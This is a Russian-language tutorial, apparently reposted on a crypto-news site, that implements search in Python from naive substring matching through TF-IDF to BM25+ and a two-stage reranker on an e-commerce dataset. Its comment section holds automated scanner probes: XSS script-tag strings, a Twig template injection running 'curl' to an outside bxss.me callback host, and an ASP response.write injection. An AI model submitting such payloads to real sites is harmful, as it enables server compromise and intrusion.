Этот сайт использует файлы cookies. Продолжая просмотр страниц сайта, вы соглашаетесь с использованием файлов cookies. Если вам нужна дополнительная информация, пожалуйста, посетите страницу Политика файлов Cookie
Subscribe
Прямой эфир
Cryptocurrencies: 9512 / Markets: 114689
Market Cap: $ 3 787 132 962 593 / 24h Vol: $ 200 392 171 953 / BTC Dominance: 58.653467328398%

Н Новости

Он победил LLM RAG: реализуем BM25+ с самых азов

Привет, меня зовут Борис. Я автор телеграм канала Борис опять. Периодически мне на глаза попадается что-то интересное и я глубоко в этом закапываюсь. В данном случае это алгоритм поиска BM25+.

Статья началась с того, что я наткнулся на громкий и забавный результат: алгоритм BM25, разработанный аж в восьмидесятые годы, победил продвинутые методы векторного поиска на LLM.

Разберемся, что это за зверь и почему он так хорошо работает. BM25 не только неожиданно эффективный метод, но и очень простой. В этой статье мы реализуем его на Python с нуля. Мы начнем с самого простого поиска, перейдем к TF-IDF, а затем выведем из него BM25+.

Статья подойдет тем, кто вообще ничего не знает о поиске, а более опытные ребята могут пролистать до реализации алгоритма.

Код доступен в Google Collab.

Когда бейзлайн обошел нейросетевые методы
Когда бейзлайн обошел нейросетевые методы

Даже в эпоху поиска с помощью больших языковых моделей, BM25 хорошо держит удар и остается сильным бейзланом. Так же он полезен на практике: он способен дополнять современные системы. Выдачу BM25 можно использовать как один из этапов ранжирования, в том числе отдавая его результаты нейросетям для дальнейшей обработки.

Для начала нам потребуются данные. Мне понравился этот датасет с описаниями ecommerce товаров. Представим, что нам нужно сделать поиск для интернет магазина. Будем двигаться от самых простых методов, постепенно улучшая их, пока не придем к BM25+.

import numpy as np
import pandas as pd
from collections import Counter
from tqdm.auto import tqdm

# https://www.kaggle.com/datasets/saurabhshahane/ecommerce-text-classification
data_url = 'https://raw.githubusercontent.com/sugatagh/E-commerce-Text-Classification/main/Dataset/ecommerceDataset.csv'
dataset = pd.read_csv(
    data_url,
    names = ['label', 'description']
)
dataset = dataset.dropna()
dataset = dataset.drop_duplicates()

В датасете нас интересует только одна колонка, которая содержит текстовое описание товара: description. Всего у нас таких товаров 27802.

Глупный, наивный поиск

Самое простое, что мы можем сделать: получив запрос пользователя найти документы, которые целиком его содержат.

documents = dataset.description.tolist()
def search_dummy(documents, query, limit=10):
    return [doc for doc in documents if query in doc][:limit]

[doc[:100] for doc in search_dummy(documents, 'smartphone', limit=2)]
# Вывод:
# ['Shinco 80 cm (32 Inches) HD Ready Smart LED TV SO32AS (Black) (2019 model) Size name:32 Inches   Thi',
#  'Amazon Brand - Solimo 12-inch Wall Clock - Checkered (Silent Movement, Black Frame) Bring function a']

Этот метод полон проблем и самая очевидная в том, что такой запрос не вернет ничего: search_dummy(documents, 'SmartphonE', limit=2) .

Необходимо сделать предобработку текстов. Чтобы не особо мудрить, уберем все символы кроме букв и чисел, а так же типичные суффиксы.

Удаление суффиксов можно назвать простым стеммингом: выделением корней. На практике для этого используются более продвинутые методы, например стеммер Портера из пакета nltk. Но у нас здесь не курс по NLP.

import string

def stem(word):
    for suffix in set(['ing', 'ly', 'ed', 'ious', 'ies', 'ive', 'es', 's', 'ment']):
        if word.endswith(suffix):
            return word[:-len(suffix)]
    return word


def preprocess_document(document):
    new_doc = ''.join(
        c for c in document if c.isalnum() or c == ' '
    ).lower().strip()
    new_doc = ' '.join([
        stem(word) for word in new_doc.split(' ')
    ])
    return new_doc

def preprocess_documents(documents):
    new_documents = []
    for doc in documents:
        new_doc = preprocess_document(doc)
        new_documents.append(new_doc)
    return new_documents

documents_preprocessed = preprocess_documents(documents)
documents_preprocessed[:1][0][:50]

# Вывод:
# 'paper plane design fram wall hang motivational off'

def search_dummy(documents, query, limit=10):
    query = preprocess_document(query)
    return [doc for doc in documents if query in doc][:limit]

search_dummy(documents_preprocessed, 'SmartphonE', limit=1)[0][:50]
# Вывод:
# 'shinco 80 cm 32 inches hd ready smart led tv so32a'

Отлично, проблема решена. Но любая опечатка в запросе сразу всё ломает, например search_dummy(documents_preprocessed, 'smrtaphone', limit=1) не вернет ничего. Так же не сработают частичные запросы вроде smar, которые часто встречаются в ecommerce.

Term Frequency на N-граммах

Для решения этих проблем нам помогут N-граммы: разбиение слов в запросе на последовательности символов длиной N.

from nltk.util import ngrams
import nltk

N_GRAM_SIZE = 3


def documents_to_ngrams(documents, n_gram_size=N_GRAM_SIZE, progress=False):
    document_ngrams = []
    iterator = documents
    if progress:
        iterator = tqdm(documents) # progress bar, т.к. процесс небыстрый
    for doc in iterator:
        doc_ngrams = []
        for word in doc.split(' '):
            word_ngrams = ngrams(word, n_gram_size)
            for ngram in word_ngrams:
                doc_ngrams.append(''.join(ngram))
        document_ngrams.append(tuple(doc_ngrams))
    document_ngrams = tuple(document_ngrams)

    return document_ngrams

documents_ngrams = documents_to_ngrams(documents_preprocessed, progress=True)
documents_ngrams[0][:5]
# Вывод:
# ('pap', 'ape', 'per', 'pla', 'lan')

Теперь нам уже недостаточно просто выводить всё, что содержит хотя бы одну N-грамму: мы получим много случайных совпадений. Логично выводить первыми те результаты, где совпадений больше всего.

Здесь возникает понятие ранжирования. Нужно не только найти документы, но и отсортировать их в некотором порядке, чтобы наиболее релевантные результаты были сверху. Для этого нужна некая функция ранжирования, которая сопоставляет каждой паре (запрос, документ) число, которое тем больше, чем документ релевантнее запросу пользователя. В данном случае наша функция ранжирования: частота совпадений, или term frequency.

def display_search_results(documents, idx_scores, char_limit=100):
    for idx, score in idx_scores:
        print(f'{score:0.2f}: {documents[idx][:char_limit]}')

def query_to_ngrams(query, n_gram_size=N_GRAM_SIZE):
    return documents_to_ngrams([query], n_gram_size=n_gram_size)[0]

def search_tf(documents_ngrams, query, limit=5, n_gram_size=N_GRAM_SIZE):
    index = [Counter(doc_ngrams) for doc_ngrams in documents_ngrams]
    query = query_to_ngrams(query, n_gram_size)

    match_scores = []
    for ngram_counts in tqdm(index):
        score = 0
        for query_ngram in query:
            score += ngram_counts.get(query_ngram, 0)
        match_scores.append(score)

    idx_scores = zip(range(len(documents_ngrams)), match_scores)
    idx_scores = sorted(idx_scores, key=lambda pair: -pair[1])

    return idx_scores[:limit]

idx_scores = search_tf(documents_ngrams, 'smratphone')
display_search_results(documents, idx_scores)

```
Вывод:
116.00: Risk Savvy: How to Make Good Decisions About the Author GERD GIGERENZER is director of the Max Planc
116.00: Risk Savvy: How to Make Good Decisions About the Author Gerd Gigerenzer is the author of Gut Feeling
105.00: HP B4B09PA Headphones with Mic Product Description HP Headphones Overview
With HP B4B09PA Over ear H
98.00: iBall Rocky Over-Ear Headphones with Mic Product Description  iBall Rocky Headset Over-Ear Headphone
96.00: The Global War on Christians: Dispatches from the Front Lines of Anti-Christian Persecution About th
```

Теперь наш поиск работает при запросах с опечатками, но результат ужасен. Разберемся, что происходит.

search_tf осуществляет поиск: принимает на вход N-граммы документов и запрос пользователя, возвращает список кортежей (индекс документа, релевантность), где релевантность это число совпадений N-грамм. Результаты сортируются и функция возвращает только limit наиболее релевантных документов.

Внутри эта функция сначала индексирует документы: считает для каждого, сколько разных N-грамм в нём содержится. Например, в документе "smasmart" содержатся следующие N-граммы: {"sma": 2, "max": 1, "asm": 1, "mar": 1, "art": 1}. Такой индекс позволяет быстро понять, сколько N-грамм из запроса находится в документе. Строго говоря, его можно было бы посчитать один раз, а не пересчитывать при каждом запросе.

Почему результат такой плохой? Длинные документы содержат больше случайных совпадений и всегда будут выше в выдаче нашего поиска.

Рассмотрим игрушечный пример:

def documents_to_index(documents, n_gram_size=N_GRAM_SIZE):
		"""Вспомогательная функция, чтобы делать предобработку и разбиение на N-граммы"""
    documents_preprocessed = [
        preprocess_document(doc) for doc in documents
    ]

    documents_ngrams = documents_to_ngrams(documents_preprocessed, n_gram_size)
    return documents_ngrams

dummy_documents = [
    'smartphone',
    'frying pan',
]
dummy_documents_ngrams = documents_to_index(dummy_documents)
idx_scores = search_tf(dummy_documents_ngrams, 'smratphone')
display_search_results(dummy_documents, idx_scores)
```
Вывод:
4.00: smartphone
0.00: frying pan
```

dummy_documents = [
    'smartphone',
    'frying pan',
    'headphones for your smartphone',
]
dummy_documents_ngrams = documents_to_index(dummy_documents)
idx_scores = search_tf(dummy_documents_ngrams, 'smratphone')
display_search_results(dummy_documents, idx_scores)

```
Вывод:
7.00: headphones for your smartphone
4.00: smartphone
0.00: frying pan
```

Чтобы решить проблему, нам бы хотелось сделать так, чтобы N-грамма sma вносила больший вклад в релевантность, если она встречается в документе относительно его длины. Например, в слове smart это одна из трех N-грамм, а в слове smartphone она имеет меньший вес.

def search_tf_weighted(documents_ngrams, query, limit=5, n_gram_size=N_GRAM_SIZE):
    index = [Counter(doc_ngrams) for doc_ngrams in documents_ngrams]
    query = query_to_ngrams(query, n_gram_size)
    match_scores = []
    for ngram_counts in index:
        score = 0
        total_ngrams = sum(ngram_counts.values())
        if total_ngrams == 0:
            continue
        for query_ngram in query:
            score += ngram_counts.get(query_ngram, 0)
        score = score/total_ngrams
        match_scores.append(score)

    idx_scores = zip(range(len(documents_ngrams)), match_scores)
    idx_scores = sorted(idx_scores, key=lambda pair: -pair[1])

    return idx_scores[:limit]

idx_scores = search_tf_weighted(dummy_documents_ngrams, 'smratphone')
display_search_results(dummy_documents, idx_scores)
```
Вывод:
0.50: smartphone
0.39: headphones for your smartphone
0.00: frying pan
```

Уже лучше.

Даже поиск по всем документам уже не бесполезен:

idx_scores = search_tf_weighted(documents_ngrams, 'smratphone')
display_search_results(documents, idx_scores) 
```
Вывод:
0.23: Apple iPhone Xs (Space Grey, 4GB RAM, 64GB Storage, 12 MP Dual Camera, 458 PPI Display) Size name:64
0.19: AmazonBasics Lighting to USB A Cable for iPhone and iPad - 4 Inches (10 Centimeters) - Black (Ideal 
0.18: VALUEACTIVE Screen Guard for Samsung Galaxy S10 Plus Tempered Glass Full Screen Coverage 5D Curved F
0.17: TSIM Lifetime Global SIM Card(1GB) Size:1GB   Voice / SMS Slabs 100 minutes/100 SMS in: Australia, B
0.17: JBL T450BT Extra Bass Wireless On-Ear Headphones with Mic (Black) Colour:Black   Colour:Black Powerf
```

idx_scores = search_tf_weighted(documents_ngrams, 'iphone 7')
display_search_results(documents, idx_scores)
```
0.31: Apple iPhone Xs (Space Grey, 4GB RAM, 64GB Storage, 12 MP Dual Camera, 458 PPI Display) Size name:64
0.24: VALUEACTIVE Screen Guard for Samsung Galaxy S10 Plus Tempered Glass Full Screen Coverage 5D Curved F
0.22: Apple iPhone 7 (Black, 2GB RAM, 32GB Storage) Colour:Black                                          
0.21: TSIM Lifetime Global SIM Card(1GB) Size:1GB   Voice / SMS Slabs 100 minutes/100 SMS in: Australia, B
0.20: AmazonBasics Lighting to USB A Cable for iPhone and iPad - 4 Inches (10 Centimeters) - Black (Ideal 
```

Мы реализовали настоящий поиск на term frequency и прошли треть пути до BM25+.

Но попробуем сделать запрос более специфичным добавив прилагательных:

idx_scores = search_tf_weighted(documents_ngrams, 'the heavy simple beautiful black iphone')
display_search_results(documents, idx_scores)

```
Вывод:
0.86: Dick Francis's Refusal Review Praise for Dick Francis’s Refusal “To the delight of Dick/Felix Franci
0.62: Apple iPhone Xs (Space Grey, 4GB RAM, 64GB Storage, 12 MP Dual Camera, 458 PPI Display) Size name:64
0.38: Betting on Horse Racing For Dummies (For Dummies Series) From the Back Cover Cash in big on multiple
0.38: Seagate 2TB Backup Plus Slim (Blue) USB 3.0 External Hard Drive for PC/Mac with 2 Months Free Adobe 
0.30: ahhaaaa Boy's Cotton Waistcoat, Shirt And Trouser Set This product is made from cotton. Ahhaaaa brin
```

Поиск снова сломался. Всё дело в том, что для нашего алгоритма все слова в запросе одинаково важны, что beautiful, что the, что iphone.

Inverse Document Frequency

Давайте придумаем как можно добавить к каждой N-грамме запроса вес, чтобы он был тем больше, чем она информативнее. Для этого подходит Inverse Document Frequency (IDF): мера того, насколько редко N-грамма встречается среди всех документов. Интуитивно, что чем реже встречается N-грамма, тем больше информации она несет. Например, если the встречается в каждом документе, то эту N-грамму вообще не стоит учитывать при расчете релевантности. И, напротив, если sma встречается в одном документе, то её наличие в запросе позволяет однозначно определить самый релевантный результат.

Реализуем IDF по стандартной формуле из Википедии:

from collections import defaultdict

def calculate_idf(documents_ngrams):
    ngram_appearance = {}
    for doc_ngrams in documents_ngrams:
        for ngram in set(doc_ngrams):
            if ngram not in ngram_appearance:
                ngram_appearance[ngram] = 0
            ngram_appearance[ngram] += 1
    idf = {}
    N = len(documents_ngrams)
    for ngram, appearance_count in ngram_appearance.items():
        idf[ngram] = np.log((1+N)/(1 + appearance_count))
    return idf

dummy_documents = [
    'smartphone',
    'frying pan',
    'headphones for your smartphone',
]
dummy_documents_ngrams = documents_to_index(dummy_documents)
dummy_idf = calculate_idf(dummy_documents_ngrams)
dummy_idf 
```
Вывод:
{'pho': 0.28768207245178085,
 'mar': 0.28768207245178085,
 'tph': 0.28768207245178085,
 'sma': 0.28768207245178085,
 'one': 0.28768207245178085,
 'art': 0.28768207245178085,
 'hon': 0.28768207245178085,
 'rtp': 0.28768207245178085,
 'pan': 0.6931471805599453,
 'fry': 0.6931471805599453,
 'adp': 0.6931471805599453,
 'our': 0.6931471805599453,
 'for': 0.6931471805599453,
 'you': 0.6931471805599453,
 'ead': 0.6931471805599453,
 'dph': 0.6931471805599453,
 'hea': 0.6931471805599453}
```

Видно, что N-граммы относящиеся к сковородке получили более высокий вес, так как встречаются реже.

Теперь релевантность документа равна сумме частот N-грамм из запроса помноженных на информативность этих N-грамм.

Она называется TF-IDF:

score(D, Q) = \sum_{i=1}^{n} IDF(q_i) TF(q_i, D)

Где D это документ, Q это запрос, а q_i это N-грамма из документа. Заметьте, что IDF не зависит от конкретного документа, т.к. рассчитывается по всем документам в нашей коллекции для каждой N-граммы.

IDF и TF можно расчитывать разными способами в зависимости от задачи.

Реализуем этот алгоритм поиска:

def search_tf_idf(
    documents_ngrams,
    query,
    limit=5,
    n_gram_size=N_GRAM_SIZE,
):
    index = [Counter(doc_ngrams) for doc_ngrams in documents_ngrams]
    idf = calculate_idf(documents_ngrams)
    query = query_to_ngrams(query, n_gram_size)

    match_scores = []
    for ngram_counts in tqdm(index):
        score = 0
        total_ngrams = sum(ngram_counts.values())
        if total_ngrams == 0:
            continue
        for query_ngram in query:
            tf_score = ngram_counts.get(query_ngram, 0)/total_ngrams
            idf_score = idf.get(query_ngram, 1e-3)
            score += tf_score * idf_score
        match_scores.append(score)

    idx_scores = zip(range(len(documents_ngrams)), match_scores)
    idx_scores = sorted(idx_scores, key=lambda pair: -pair[1])

    return idx_scores[:limit]

dummy_documents = [
    'smartphone',
    'frying pan',
    'headphones for your smartphone',
]
dummy_documents_ngrams = documents_to_index(dummy_documents)
idx_scores = search_tf_idf(dummy_documents_ngrams, 'smratphone')
display_search_results(dummy_documents, idx_scores)
```
Вывод:
0.14: smartphone
0.11: headphones for your smartphone
0.00: frying pan
```

Полноценный поиск работает уже лучше, но всё равно не идеально:

idx_scores = search_tf_idf(documents_ngrams, 'health smartwatch')
display_search_results(documents, idx_scores)
```
Вывод:
0.96: A History of American Literature Review "Richard Gray's real achievement is somehow to have compress
0.88: Samsung Gear Sport Smartwatch (Black) Colour:Black   Sports watch design in premium stainless steel 
0.85: American Pastoral Amazon.com Review Philip Roth's 22nd book takes a life-long view of the American e
0.53: M3 Intelligence Bluetooth Health Wrist Smart Band Watch Monitor/Smart Bracelet/Health Bracelet/Activ
0.52: Textbook of Elements of Veterinary Public Health Veterinary Public Health is a multidisciplinary fie
```

BM25+

На самом деле BM25+ это частный случай TF-IDF с определенным выбором TF и IDF. Поэтому мы к нему так долго добирались.

Его задумка в том, чтобы сделать такие веса, на которые не будут так сильно влиять длина документов.

Так же он имеет основания из Теории Информации: IDF в BM25+ это по сути собственная информация по Шеннону, то есть сколько информации содержит данная N-грамма.

Помимо этого BM25+ лучше всего работает на словах, а не N-граммах.

Формулы (страшные):

TF(q_i, D) = \frac{(f(q_i, D) \times (k_1 + 1)}{(f(q_i, D) \times (k_1 + 1) + (1 - b + b \cdot \frac{|D|}{avgdl})} + \deltaIDF(q_i) = ln(\frac{N - n(q_i) + 0.5}{n(q_i) + 0.5} + 1)score(D, Q) = \sum_{i=1}^{n} IDF(q_i) TF(q_i, D)

Здесь:

  • D - документ.

  • Q - запрос.

  • f(q_i, D) - число вхождений слова q_i в документ.

  • |D| - длина документа.

  • avgdl - средняя длина документов в коллекции.

  • N - число документов в коллекции.

  • n(q_i) - число документов, содержащих слово q_i.

  • k_1 - параметр в диапазоне [1.2, 2.0].

  • b - параметр, обычно 0.75.

  • \delta - параметр, обычно 1.

По сути TF это вес слова в документе, а IDF это информативность этого слова. Наибольшую релевантность получают документы, в которых много места занимают редкие слова.

Свободные параметры регулируют поведение функции ранжирования. Их можно оставить как есть или подбирать под задачу.

Как ведут себя IDF и TF в BM25+?

Давайте поглядим на TF и IDF, чтобы понять, в чем суть именно таких весов.

IDF:

IDF в зависимости от числа документов, содержащих слово.
IDF в зависимости от числа документов, содержащих слово.

Информативность редких слов очень высокая. Разница между информативностью слова, встречающегося в одном документе, и слова, встречающемся в двух, огромная. Однако чем чаще встречается слово, тем больше происходит насыщение: между словом содержащимся в 40,000 документах и 60,000 документах практически нет разницы.

TF:

TF в зависимости от вхождений слова в документ и длины документа.
TF в зависимости от вхождений слова в документ и длины документа.

Видно, что чем чаще слово встречается в документе, тем выше его вес. Однако есть эффект насыщения: между 10 вхождениями и 20 вхождениями разница небольшая. Так же вес выше, если документ короткий. Всё это позволяет уменьшить влияние длинных документов и случайных совпадений.

Реализация BM25+

Осталось только реализовать всё по формулам. В этот раз сделаем всё красиво, обернув код в класс, и не будем пересчитывать индекс при каждом запросе.

def documents_to_words(documents):
    documents_words = tuple([doc.split(' ') for doc in documents])
    documents_words = tuple(documents_words)
    return documents_words

def bm25_documents_to_index(documents):
    documents_preprocessed = [
        preprocess_document(doc) for doc in documents
    ]

    documents_words = documents_to_words(documents_preprocessed)
    return documents_words

def bm25_query_to_wrods(query):
    return bm25_documents_to_index([query])[0]

def idf_bm25(
    number_documents_containing_ngram,
    total_documents,
):
    x = (total_documents - number_documents_containing_ngram + 0.5)/(number_documents_containing_ngram + 0.5)
    return np.log(x + 1)

def tf_bm25(ngram_tf, document_length, average_document_length, k1=1.5, b=0.75, delta=1):
    numerator = ngram_tf*(k1+1)
    denominator = ngram_tf + (k1 * (1 - b + b * document_length/average_document_length))
    return numerator/denominator + delta

def bm25_score(
    ngram_idf,
    ngram_tf,
    document_length,
    average_document_length,
    k1=1.5,
    b=0.75,
):
    numerator = ngram_tf*(k1+1)
    denominator = ngram_tf + (k1 * (1 - b + b * document_length/average_document_length))
    return ngram_idf * tf_bm25(ngram_tf, document_length, average_document_length, k1=k1, b=b)


class SearchBM25:
    def __init__(self):
        self.documents = None
        self.documents_ngrams = None
        self.tf = None
        self.idf = None

    def calculate_tf(self, documents_ngrams):
        tf = [Counter(doc_ngrams) for doc_ngrams in documents_ngrams]

        return tf

    def calculate_idf(self, tf, documents_ngrams):
        idf = {}

        documents_containing = {}

        for doc_tf in tqdm(tf):
            for ngram in doc_tf.keys():
                if not ngram in documents_containing:
                    documents_containing[ngram] = 0
                documents_containing[ngram] += 1

        for ngram in tqdm(documents_containing.keys()):
            idf[ngram] = idf_bm25(
                number_documents_containing_ngram=documents_containing[ngram],
                total_documents=len(documents_ngrams),
            )
        return idf

    def fit(
        self,
        documents,
    ):
        self.documents = documents

        self.documents_ngrams = bm25_documents_to_index(
            documents,
        )

        self.tf = self.calculate_tf(self.documents_ngrams)
        self.idf = self.calculate_idf(self.tf, self.documents_ngrams)

    def search_bm25(
        self,
        query,
        limit,
        only_documents=None,
    ):
        avg_document_length = sum([
            len(doc) for doc in self.documents_ngrams
        ])/len(self.documents_ngrams)
        query = bm25_query_to_wrods(query)
        indexes = []
        match_scores = []

        document_indexes = range(len(self.tf)) if only_documents is None else only_documents
        for i in document_indexes:
            document_tf = self.tf[i]

            document_length = sum(document_tf.values())
            if document_length == 0:
                continue

            score = 0
            for query_ngram in query:
                ngram_score = bm25_score(
                    self.idf.get(query_ngram, 1e-6),
                    document_tf.get(query_ngram, 1e-6),
                    document_length=document_length,
                    average_document_length=avg_document_length,
                )
                score += ngram_score
            match_scores.append(score)
            indexes.append(i)

        idx_scores = zip(indexes, match_scores)
        idx_scores = sorted(idx_scores, key=lambda pair: -pair[1])
        return idx_scores[:limit]


    def search(self, query, limit=5):
        idx_scores = self.search_bm25(
            query,
            limit=limit,
        )
        return idx_scores[:limit]

    def search_and_display(self, query, limit=5, char_limit=100):
        idx_scores = self.search(query, limit=limit)
        display_search_results(self.documents, idx_scores, char_limit=char_limit)


index = SearchBM25()
index.fit(documents)

index.search_and_display('frying')
```
Вывод:
16.30: Taylor Candy and Deep Fry Stainless Steel Thermometer TAYLOR 5983N Candy/Jelly Deep Fry Thermometer
16.02: Bhavya enterprises Stainless Steel Deep Fat Fryer 8+8 L (Silver) Frying machine used in commercial s
15.96: Hk Villa 2 In 1 Multifuctional Steaming Device egg pan Frying Egg Boiling Roasting Heating Electric 
15.71: HomeFast Multifunction Non-Stick Electric Frying Pan Egg Omelette Pancakes Steak Egg Boiler Electric
15.66: Vishal Smart Mall Multifunction Non-Stick Electric Frying Pan Egg Omelette Pancakes Steak Egg Boiler
```

index.search_and_display('iphone 6s')
```
21.93: Mpow iPhone 6 6s iPhone 7 8 Armband, [Ultra Comfortable] Adjustable Sports Armband Sweatproof Runnin
21.39: MADANYU The Man in Suit for Real Man Designer Printed Hard Back Shell Case for Apple iPhone 6S / App
21.22: POPIO Tempered Glass Screen Protector For iPhone 6 / iPhone 6S / iPhone 7 / iPhone 8 (Pack Of 2) Col
21.21: UNMCORE IPhone 8 Pin Lightning To USB Fast Data Charging Sync Cable Wall Charger With USB Power Adap
21.00: Apple iPhone 6 (Gold, 1GB RAM, 32GB Storage) Colour:Gold   Apple iPhone 6 (Gold, 32GB)
```

На некоторых запросах поиск работает хорошо, но на других хуже TF-IDF.

BM25+ достаточно чувствителен к правильной предобработке текста. Другая его проблема в том, что в такой реализации он неустойчив к опечаткам и не способен обрабатывать частичные запросы.

Двухэтапный поиск: TF-IDF + BM25+

Мы можем объединить все преимущества TF-IDF и BM25+. Для этого мы реализуем двухэтапный поиск: сначала TF-IDF на N-граммах будет искать большое число документов-кандидатов, затем BM25+ будет ре-ранжировать эти документы и возвращать лучшие.

from scipy.stats import gmean

class SearchTFIDF:
    def __init__(self, n_gram_size=N_GRAM_SIZE):
        self.n_gram_size = n_gram_size

        self.documents = None
        self.documents_ngrams = None

    def fit(
        self,
        documents,
    ):
        self.documents = documents

        self.documents_ngrams = documents_to_index(
            documents,
            n_gram_size=self.n_gram_size,
        )

    def search(self, query, limit=5):
        idx_scores = search_tf_idf(
            self.documents_ngrams,
            query,
            limit=limit,
            n_gram_size=self.n_gram_size,
        )
        return idx_scores[:limit]

    def search_and_display(self, query, limit=5):
        idx_scores = self.search(query, limit=limit)
        display_search_results(self.documents, idx_scores)
        
class TwoStageSearch:
    def __init__(self, n_gram_size=3):
        self.n_gram_size = n_gram_size
        self.documents = None
        self.tfidf_index = None
        self.bm25_index = None

    def fit(
        self,
        documents,
    ):
        self.documents = documents

        self.tfidf_index = SearchTFIDF(n_gram_size=self.n_gram_size)
        self.tfidf_index.fit(self.documents)

        self.bm25_index = SearchBM25()
        self.bm25_index.fit(self.documents)

    def search(self, query, limit_stage1=100, limit_stage2=5):
        idx_scores_stage1 = self.tfidf_index.search(query, limit=limit_stage1)
        idx_scores_stage1 = [p for p in idx_scores_stage1 if p[1] > 1e-05]
        idx_to_score_stage1 = {
            idx: score for idx, score in idx_scores_stage1
        }
        only_document_indexes = list(idx_to_score_stage1.keys())
        idx_scores_stage2 = self.bm25_index.search_bm25(query, limit=limit_stage2, only_documents=only_document_indexes)

        aggregated_scores = {
            idx: gmean([score, idx_to_score_stage1[idx]]) for idx, score in idx_scores_stage2
        }
        idx_scores = [(idx, idx_to_score_stage1[idx], score, aggregated_scores[idx]) for idx, score in idx_scores_stage2]

        idx_scores = sorted(idx_scores, key=lambda x: (-round(x[-1],3), -round(x[-2],3), -round(x[-3], 3)))

        return idx_scores

    def display_search_results(self, idx_scores, char_limit=100):
        for idx, score_stage1, score_stage2, score_combined in idx_scores:
            print(f'{score_stage1:0.2f}|{score_stage2:0.2f}|{score_combined:0.2f}: {self.documents[idx][:char_limit]}')

    def search_and_display(self, query, limit_stage1=100, limit_stage2=5, char_limit=100):
        idx_scores = self.search(query, limit_stage1=limit_stage1, limit_stage2=limit_stage2)
        self.display_search_results(idx_scores, char_limit=char_limit)

Код может быть пугающим, но логика простая:

  1. Строим индексы для TF-IDF и BM25+

  2. При поступлении запроса сначала запускаем TF-IDF и получаем 100 самых релевантных результата.

  3. Запускаем BM25+ на этих результатах и получаем 5 самых релевантных.

  4. Чтобы отсортировать результаты мы усредняем оценки полученные от TF-IDF и BM25+ геометрическим средним (в отличие от арифметического оно устойчиво к тому, что оценки могут находится на разных шкалах).

  5. Сортируем результаты по усредненным оценкам. При ничьей сортируем по оценка от TF-IDF.

Давайте опробуем.

index = TwoStageSearch()
index.fit(documents)
index.search_and_display('iph')

```
Вывод:
0.12|0.00|0.00: Apple iPhone 8 (Space Grey, 2GB RAM, 64GB Storage)
0.09|0.00|0.00: Natation 3D VR Box Virtual Reality Glasses (VR_Headset) (VR Basic)
0.08|0.00|0.00: Tidy Up! Wire Bin (Black)
0.06|0.00|0.00: Orion Premium Telescope Accessory Kit - 1.25" Orion Orion 08890 1.25-Inch Premium Telescope Accessor
0.04|0.00|0.00: Apple iPhone 6S (Rose Gold, 2GB RAM, 32GB Storage)
```

index.search_and_display('iphone xs 64GB')
```
Вывод:
0.50|7.29|1.91: Apple iPhone 8 Plus (Space Grey, 64GB) Colour:Space Grey                                            
0.36|7.49|1.64: SKYVIK Beam QI Certified 7.5W & 10W Fast Wireless Charger for iPhone X XS Max XR iPhone 8 & 8 Plus S
0.29|7.40|1.46: Apple iPhone 8 (Space Grey, 2GB RAM, 64GB Storage)
0.19|8.58|1.28: STORETHATSAYS Vivo V9 Compatible Camera Tripod Portable & Foldable Stand with Mobile Clip Holder Com
0.19|8.56|1.28: STORETHATSAYS Google Pixel 2 and 2 XL Compatible Camera Tripod Portable & Foldable Stand with Mobile
```

index.search_and_display('iphone charger')
```
Вывод:
0.81|15.16|3.50: SKYVIK Beam QI Certified 7.5W & 10W Fast Wireless Charger for iPhone X XS Max XR iPhone 8 & 8 Plus S
0.36|16.79|2.47: Belkin Boost Up Wireless Charging Pad 7.5W - Wireless Charger Optimized for iPhone, Compatible with 
0.31|14.71|2.13: Baseus [Certified] Fast Qi Wireless Charger Leather Pad Stand Baseus Wireless Charger For Iphone X 8
0.31|13.87|2.06: Syncwire Lightning Charger Cable Cord for iPhone 5 - iPhoneX Smartphones, iPad Mini, iPad Air, iPad 
0.26|14.87|1.97: Baseus B® Smart 2 in 1 Wireless Charger for Apple IWatch and Qi Enabled Phone Charger for Apple iPho
```

Теперь наш поиск успешно обрабатывает частичные запросы, устойчив к опечаткам и выдает небесполезные результаты. Конечно, до настоящего поиска в продакшне ему ещё далеко.


В этой статье мы реализовали алгоритм BM25+ и использовали его для ре-ранжирования результатов другого алгоритма поиска. Стоит отметить ограничения BM25+:

  • Он ничего не понимает про смысл, в отличие от векторного поиска на нейросетевых моделях.

  • Как следствие предыдущего пункта, он ничего не понимает про синонимы.

  • Без дополнительных оптимизаций от требует прохода по всей коллекции документов. Нейросетевой Approximate Nearest Neighbors поиск не страдает такой проблемой.

Если вы хотите поупражняться, то вот несколько идей, что можно реализовать:

  • Сделать так, чтобы к индексу можно было добавить новый документ не пересчитывая всё целиком.

  • Ускорить! Реализация выше абсолютно наивна, пространство для улучшения огромное.

  • Прикрутить более умный токенизатор, чем разбиение на слова. Например, можно посмотреть на FastText.

  • Реализовать метрику качества ранжирования NDCG, проверить качество выдачи. Затем подобрать наилучшие параметры BM25+.


Если вам понравился этот материал, то может быть понравится и другие вещи, которые я пишу: подписывайтесь на мой канал в телеграме, где я слишком часто (для своей психики) выкладываю полезный контент про IT, машинное обучение и не только.

Источник

  • 09.10.25 08:09 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:09 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:09 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:09 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?'"()&%<zzz><ScRiPt >6BEP(9887)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityjalvnplljd6041.bxss.me")}}

  • 09.10.25 08:13 pHqghUme

    '"()&%<zzz><ScRiPt >6BEP(9632)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?9425407

  • 09.10.25 08:13 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:14 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:16 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    "+response.write(9043995*9352716)+"

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

